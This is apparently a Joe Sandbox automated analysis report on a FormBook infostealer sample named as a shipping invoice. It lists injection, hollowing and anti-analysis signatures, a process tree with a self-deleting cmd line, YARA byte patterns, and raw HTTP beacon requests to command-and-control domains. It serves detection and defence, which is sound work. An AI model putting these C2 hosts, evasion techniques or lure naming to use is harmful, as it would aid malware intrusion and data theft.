Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Shipping INVOICE-BL Shipment..exe

Overview

General Information

Sample Name:Shipping INVOICE-BL Shipment..exe
Analysis ID:323227
MD5:579ba39b6a146080ef6481591440e445
SHA1:06bfc3b47e1ad6a35e10cb4a1edee6c563710107
SHA256:d8d9bb65ea3637fda09488baada0c9b387e0619b7c430b93c8a0fa2d8b489bc1
Tags:Formbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Executable has a suspicious name (potential lure to open the executable)
Hijacks the control flow in another process
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Shipping INVOICE-BL Shipment..exe (PID: 2792 cmdline: 'C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe' MD5: 579BA39B6A146080EF6481591440E445)
    • rundll32.exe (PID: 1748 cmdline: rundll32.exe Prehnite,Lychnises MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 6360 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • netsh.exe (PID: 4768 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • cmd.exe (PID: 6908 cmdline: /c del 'C:\Windows\SysWOW64\cmd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16679:$sqlite3step: 68 34 1C 7B E1
    • 0x1678c:$sqlite3step: 68 34 1C 7B E1
    • 0x166a8:$sqlite3text: 68 38 2A 90 C5
    • 0x167cd:$sqlite3text: 68 38 2A 90 C5
    • 0x166bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.cmd.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.cmd.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13855:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13341:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13957:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13acf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x856a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x92e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18947:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x199ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.cmd.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15879:$sqlite3step: 68 34 1C 7B E1
        • 0x1598c:$sqlite3step: 68 34 1C 7B E1
        • 0x158a8:$sqlite3text: 68 38 2A 90 C5
        • 0x159cd:$sqlite3text: 68 38 2A 90 C5
        • 0x158bb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x159e3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.cmd.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.cmd.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Prehnite.dllReversingLabs: Detection: 27%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Shipping INVOICE-BL Shipment..exeVirustotal: Detection: 27%Perma Link
          Source: Shipping INVOICE-BL Shipment..exeReversingLabs: Detection: 44%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 2.2.cmd.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00406469 FindFirstFileA,FindClose,0_2_00406469
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00402765 FindFirstFileA,0_2_00402765
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040592E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi2_2_00416227
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi2_2_0040C37F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop esi2_2_004157F1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi9_2_02F76227
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi9_2_02F6C37F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop esi9_2_02F757F1

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49766
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49767
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 75.126.100.11:80 -> 192.168.2.4:49769
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49771
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.carnesveymacr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS HTTP/1.1Host: www.mehler.photographyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG HTTP/1.1Host: www.thelonerangernews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.hvcharging.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 HTTP/1.1Host: www.jddq888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.wtmailer15.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly HTTP/1.1Host: www.wastie.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.gettingthehelloutofca.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a HTTP/1.1Host: www.caelaabadie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.0.78.24 192.0.78.24
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.carnesveymacr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS HTTP/1.1Host: www.mehler.photographyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG HTTP/1.1Host: www.thelonerangernews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.hvcharging.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 HTTP/1.1Host: www.jddq888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.wtmailer15.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly HTTP/1.1Host: www.wastie.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1Host: www.gettingthehelloutofca.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a HTTP/1.1Host: www.caelaabadie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.carnesveymacr.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Nov 2020 14:09:00 GMTServer: Apache/2.4.6 (CentOS) PHP/7.3.19Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 71 67 66 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mqgf/ was not found on this server.</p></body></html>
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Shipping INVOICE-BL Shipment..exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Shipping INVOICE-BL Shipment..exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: nse53A7.tmp.0.drString found in binary or memory: http://openoffice.org/2001/block-list
          Source: explorer.exe, 00000004.00000000.693351563.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: nse53A7.tmp.0.drString found in binary or memory: http://www.businessobjects.com0
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: nse53A7.tmp.0.drString found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_004053CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004053CB

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: Shipping INVOICE-BL Shipment..exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Shipping INVOICE-BL Shipment..exe
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00418180 NtCreateFile,2_2_00418180
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00418230 NtReadFile,2_2_00418230
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_004182B0 NtClose,2_2_004182B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041817A NtCreateFile,2_2_0041817A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_004182DA NtClose,2_2_004182DA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_004182AC NtClose,2_2_004182AC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B795D0 NtClose,LdrInitializeThunk,2_2_04B795D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79540 NtReadFile,LdrInitializeThunk,2_2_04B79540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B796E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_04B796E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B797A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_04B797A0
